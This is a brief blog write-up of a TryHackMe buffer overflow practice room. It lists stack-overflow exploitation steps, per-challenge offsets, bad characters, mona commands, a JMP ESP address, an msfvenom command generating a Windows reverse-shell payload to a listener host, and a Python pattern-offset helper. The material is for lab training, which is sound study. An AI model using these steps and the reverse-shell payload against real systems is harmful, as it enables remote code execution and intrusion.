TryHackMe - Buffer Overflow Room

MrNmap
2 min read, Aug 18, 2020


Practice stack-based buffer overflows!

This is a simple write-up; there will be no screenshots, flags, etc.

Steps involved in a buffer overflow

  1. Find the IP, port and the message to send
  2. Fuzz to find the crash point
  3. Create a pattern: /usr/share/metasploit-framework/tools/exploit/pattern_create -l size_of_crash
  4. Send the created pattern and determine EIP
  5. Find the offset from EIP: /usr/share/metasploit-framework/tools/exploit/pattern_offset -q EIP
  6. Control EIP => "A" * OffsetValue + "B" * 4 + "C" * (buff - len(buff))
  7. Find a JMP ESP in an executable module => kernel32.dll || user32.dll || shell32.dll
  8. Find the JMP ESP instruction
  9. Find bad characters
  10. Final payload
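As an added example (not part of the original write-up), the Python below reimplements what pattern_create and pattern_offset in steps 3 to 5 compute, so the offset lookup can be checked without Metasploit installed; the EIP value 6F43396E is a constructed sample, not a value from the room.

```python
import string
import struct

# Added example: Metasploit-style pattern_create / pattern_offset logic.
# Steps 3-5 of the write-up: send a cyclic pattern of the crash size, read
# the value that landed in EIP, and map it back to an offset in the buffer.

def pattern_create(length):
    """Cyclic pattern 'Aa0Aa1Aa2...Aa9Ab0...' truncated to `length` characters.

    Each (upper, lower, digit) triple occurs once, so any 4-byte window of the
    buffer is unique and a single crash value identifies one offset.
    """
    triples = []
    for upper in string.ascii_uppercase:
        for lower in string.ascii_lowercase:
            for digit in string.digits:
                triples.append(upper + lower + digit)
                if len(triples) * 3 >= length:
                    return "".join(triples)[:length]
    return "".join(triples)[:length]  # caller asked for more than 20280 bytes


def pattern_offset(pattern, eip):
    """Offset in `pattern` of the 4 bytes that ended up in EIP, or -1 if absent.

    `eip` is the register value as shown by the debugger (int or hex string).
    x86 is little-endian, so the register holds the buffer bytes reversed;
    struct.pack("<I") restores the original byte order before searching.
    """
    if isinstance(eip, str):
        eip = int(eip, 16)
    needle = struct.pack("<I", eip).decode("ascii", errors="replace")
    return pattern.find(needle)


if __name__ == "__main__":
    crash_size = 2000                     # steps 1-2: input size that crashed the target
    pattern = pattern_create(crash_size)  # step 3: sent in place of the plain A's
    eip_seen = "6F43396E"                 # constructed sample debugger value, not from the room
    print("offset:", pattern_offset(pattern, eip_seen))  # step 5
```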

OSCP Buffer Overflow Task

10 OVERFLOW applications in total

Login via xfreerdp: xfreerdp /v:10.10.17.30 /u:admin /p:password

IP: 10.10.17.30

OSCP_BF_1 =>
{
1. Find crash point => 2000
2. Find offset => 1978
3. Find bad chars => "\x00\x07\x2e\xa0"
4. Find JMP ESP => 625011AF => "\xaf\x11\x50\x62"
5. Payload => msfvenom -p windows/shell_reverse_tcp LHOST=192.168.135.128 LPORT=1234 EXITFUNC=thread -b "\x00\x07\x2e\xa0" -f c

}
OSCP_BF_2
{
Send the same input with the "OVERFLOW2 " command
1. Find crash at 1000
2. Find offset 634
3. Bad characters
}
OSCP_BF_3
{
1. Offset 634
2. BC => \x00\x23\x3c\x83\xba
!mona config -set workingfolder c:\mona\%p
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a esp

}
OSCP_BF_4
{
1. Find offset 1274
2. Find bad chars => \x00\x11\x40\x5f\xb8\xee
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 010EFA18
}
OSCP_BF_5
{
1. Offset 2026
2. Bad chars => \x00\xa9\xcd\xd4
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 009AFA18
}
OSCP_BF_6
{
Offset 314
Bad chars => \x00\x16\x2f\xf4\xfd
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 00AFFA18
}
OSCP_BF_7
{
Offset 1034
Bad chars => \x00\x08\x2c\xad\xae
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 0096FA18
}
OSCP_BF_8
{
Offset 1306
Bad chars => \x00\x8c\xae\xbe\xfb
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 0094FA18
}
OSCP_BF_9
{
1. Offset 1786
Bad chars => \x00\x1d\x2e\xc7\xee\xef
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 0109FA18
}
OSCP_BF_10
{
1. Offset 1514
Bad chars => \x00\x04\x3e\xe1\xe2
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 010EFA18
}
OSCP_BF_11
{
1. Offset 537
Bad chars => \x00\xa0\xad\xbe\xde\xef
!mona bytearray -b "\x00"
!mona compare -f C:\mona\oscp\bytearray.bin -a 010AFA18
}
Connect to the application: nc 10.10.17.30 1337


Security Engineer | Penetration Tester | Red Team | Telecom Security | 5G security | Speaker